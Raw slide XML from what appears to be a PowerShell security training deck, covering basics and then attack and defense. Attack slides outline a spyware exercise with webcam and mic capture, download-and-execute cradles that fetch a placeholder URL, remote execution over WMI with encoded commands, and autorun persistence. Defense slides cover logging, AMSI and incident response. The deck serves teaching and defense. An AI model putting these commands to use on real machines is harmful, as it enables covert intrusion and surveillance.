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  <p:sldMasterId id="2147483674" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="286" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="281" r:id="rId8"/>
    <p:sldId id="26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4" r:id="rId26"/>
    <p:sldId id="287" r:id="rId27"/>
    <p:sldId id="284" r:id="rId2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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307080" y="1073520"/>
            <a:ext cx="11788200" cy="56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Start-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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PowershellTraining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 in to Windows 10 and run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powershell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Windows 10? Get a free Windows Server 2016 instance via AWS.  Raise your hand for instructions .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-742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78F9C-D098-4F4F-A885-4DA64F80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192" cy="475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3B203A-05BF-4475-9324-C2C0426E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688" y="5941238"/>
            <a:ext cx="2780592" cy="91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07080" y="107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Invoke-Demo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5FE51-B04D-47B2-858B-52EF6912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192" cy="475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39600" y="731520"/>
            <a:ext cx="9999720" cy="46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-30600" y="960480"/>
            <a:ext cx="1013508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698400" y="293040"/>
            <a:ext cx="8899560" cy="697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27862" y="616319"/>
            <a:ext cx="11863538" cy="6075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Create a simple Powershell spyware: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Communicate with a web page (via POST + hidden IE window)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Retrieve user and computer info, programs, defenses…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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod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 on webcam and mic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Activated by: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Malicious Word document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remotely</a:t>
            </a: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 to a malicious website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03170" y="741010"/>
            <a:ext cx="11988829" cy="59299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Get a list of local users using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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net users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Repeat #1, but now enclose the command with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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Invoke-Expression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Download an unlisted paste using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0" strike="noStrike" spc="-1" dirty="0" err="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WebRequest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The content property is the raw text.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Execute an unlisted paste: Repeat #3, but now enclose the content property with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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Invoke-Expression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36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03171" y="741010"/>
            <a:ext cx="11988230" cy="59299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Invoke-Expression (Expression)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Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" spc="-1" dirty="0" err="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WebRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000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website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000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$webpage = Invoke-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WebRequest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"http://website"</a:t>
            </a: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webpage.content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contains the HTML response.</a:t>
            </a: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36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9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61606" y="460080"/>
            <a:ext cx="12029793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Command Execution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the same network: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WMI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3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wmic /node:”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0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TargetComputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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” process call create “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0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powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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–e &lt;base64EncodedCommand&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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Task Scheduler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Autorun: Place a Powershell script in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600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C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup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Autorun:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600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HKLM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600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:\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600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CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600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\Run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Append a PS script to a program shortcut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4735" y="616320"/>
            <a:ext cx="10514880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Command Execution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Internet-based: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Periodically download and execute a script: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Website (HTTPs): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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Invoke-Expression(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0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Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0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DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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('http://url.for.script’)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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ICMP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a listener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Why Powershell?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149482" y="1647720"/>
            <a:ext cx="9068760" cy="4960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Default with Win 7+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Powerful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Signed by Microsoft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Whitelisted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Used by Sysadmins for legitimate tasks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Used by attackers for illegitimate tasks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1898201" y="4069416"/>
            <a:ext cx="639720" cy="731880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1779" h="2035">
                <a:moveTo>
                  <a:pt x="444" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="444" y="1525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="889" y="2034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1778" y="1525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333" y="1525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="36720">
            <a:solidFill>
              <a:srgbClr val="2C00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898201" y="5339017"/>
            <a:ext cx="639720" cy="731880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1779" h="2035">
                <a:moveTo>
                  <a:pt x="444" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="444" y="1525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="889" y="2034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1778" y="1525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333" y="1525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="36720">
            <a:solidFill>
              <a:srgbClr val="2C00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AE32B-AF12-4326-850D-CBB73FD3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17" y="1449449"/>
            <a:ext cx="6273511" cy="3351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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307080" y="1073520"/>
            <a:ext cx="11788200" cy="56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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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SlidesDisclaimer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These slides complement the live condensed one-day Powershell training session.  There are not meant to be used as a stand-alone guide and may miss some context.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0199-4F96-4933-B458-1ADE37C4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192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5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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307080" y="1073520"/>
            <a:ext cx="10514880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 – Defend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Create a simple monitoring tool:</a:t>
            </a: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Alert on suspicious events</a:t>
            </a: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Kill ransomware</a:t>
            </a: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Basic incident response tool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3B9E8CE-89E4-467F-9F7D-8CAAF996B2A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1728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Defend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7080" y="477360"/>
            <a:ext cx="10514880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Prevention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Remove Admin privileges as much as possible (easy to difficult)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Whitelisting (requires time)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Reduce privileges to minimum necessary (requires time)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Powershell Constrained Mode (medium to difficult)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Anti-Malware Scan Interface (AMSI) (medium)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Detetction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Turn on Powershell logging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Sysmon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and audit for suspicious events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Transcripts (medium)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1728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Defend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 flipH="1">
            <a:off x="960480" y="270720"/>
            <a:ext cx="14760" cy="5870880"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6336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Line 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975240" y="6156720"/>
            <a:ext cx="10911960" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6336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 rot="16200000">
            <a:off x="-921077" y="1646099"/>
            <a:ext cx="2740353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Effectiveness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9328680" y="6157080"/>
            <a:ext cx="1260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Effort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2592255" y="2370402"/>
            <a:ext cx="3014739" cy="802273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admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" strike="noStrike" spc="-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privs</a:t>
            </a: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workstations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9005006" y="1875931"/>
            <a:ext cx="2699281" cy="891654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admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" strike="noStrike" spc="-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privs</a:t>
            </a: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servers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9699087" y="829056"/>
            <a:ext cx="2005200" cy="989092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Granular permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D0AB9C7-92DF-49AF-94EB-ABB92751EFE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008227" y="3408450"/>
            <a:ext cx="2005200" cy="11517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Powershell Logging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9E5DFEB2-AAF3-4029-841F-042B8230474C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5606994" y="5254752"/>
            <a:ext cx="2615645" cy="852152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Rename powershell.exe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9BBD2159-8D62-4548-B36B-FEFA0E935EA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4592821" y="3250164"/>
            <a:ext cx="2615645" cy="988489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Enforce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" strike="noStrike" spc="-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ExecutionPolicy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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47AB2495-6B01-476B-826A-16BD9F503BC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3428083" y="486886"/>
            <a:ext cx="2668812" cy="11517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 response to Powershell Logging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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA099417-EC6B-4194-93D1-7EAC28402E02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240513" y="270718"/>
            <a:ext cx="1057112" cy="6788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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA15BCD4-CA6E-456A-B8B5-676D6E1E89BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1959674" y="6427793"/>
            <a:ext cx="1833731" cy="387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Monitoring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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC4DF992-315A-449F-AD09-C4B0310B2B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6405391"/>
            <a:ext cx="1833731" cy="421052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800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Preventive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="CustomShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D58922F3-48FA-4A45-A94A-4954AE6CF240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7495756" y="373710"/>
            <a:ext cx="2005200" cy="985621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Constrained Mode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58588825-39C4-4A9E-9247-DB620D51B683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8286987" y="5254752"/>
            <a:ext cx="2615645" cy="852152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 powershell.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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85D3C1-BAE3-45B1-B067-E30756AC07C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2792700" y="1688473"/>
            <a:ext cx="1000705" cy="172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Defend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7080" y="1073520"/>
            <a:ext cx="10514880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Incident Response Basics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Query event logs using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1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Winevent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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Important events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via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Audit policy (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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auditpol.exe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2. Environmental awareness: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Computer info, running processes and their hashes, antivirus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3. Latest running programs and opened documents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3685" y="657884"/>
            <a:ext cx="11684029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Recommended </a:t>
            </a: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Defensive</a:t>
            </a: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Tools</a:t>
            </a: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PowerUp</a:t>
            </a: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to check for issues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PowerForensics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9E73BB1-0757-445D-B6CC-68AE0DAAE8A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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Defend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3685" y="657884"/>
            <a:ext cx="11684029" cy="54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Recommended Attack Frameworks and Tools</a:t>
            </a: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Empire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PowerSploit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Nishang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Invoke-Obfuscation  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="48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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> creative and original</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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 with Powershell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928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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307080" y="1073520"/>
            <a:ext cx="11788200" cy="56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PowershellTraining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E99AC-1969-4652-9C96-45E8E219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192" cy="4754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89F705-2253-4CCD-B515-7AD5F8578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8" y="4669264"/>
            <a:ext cx="4142474" cy="13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3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7491600" y="3056400"/>
            <a:ext cx="5188320" cy="38008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36741" y="1045385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Display-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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-Basics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-Demo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-Attack and Defend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-I’m a liar (condensed version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a 5-day course)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7080" y="107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Cmdlet: Get-Process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4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="11018" t="1612" r="8589" b="2935"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454880" y="2641680"/>
            <a:ext cx="4634640" cy="412668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07080" y="107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Everything</a:t>
            </a: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an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has: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Methods = action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Properties = values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7080" y="107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Variables: $name = value (object)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844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4200" y="595218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Start a new Calculator (calc.exe) processes using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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Start-Process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Select 3 properties and display them.</a:t>
            </a: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Assign the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process to a new variable, $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calcProcess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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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40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-Process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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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What does the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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4000" b="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calcProcess.WaitForExit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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do?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7080" y="1073519"/>
            <a:ext cx="10514880" cy="5161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output formatting:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="6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-Format-Table (default)</a:t>
            </a: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-Format-List</a:t>
            </a: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-Out-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6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GridView</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6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-Export-CSV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07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1400" cy="4600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Powershell Basics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637422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Find all .txt files in the user profile folder (c:\users\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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</a:t>
            </a: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using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="48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4800" b="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ChildItem</a:t>
            </a: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Export the list to a CSV file using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="48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Export-CSV</a:t>
            </a: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but only for these properties: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en-US" sz="48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Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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en-US" sz="48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CreationTime</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="48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2018-06-06T22:10:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-06T22:11:14Z</dcterms:modified>
  <dc:language/>
</cp:coreProperties>
</file>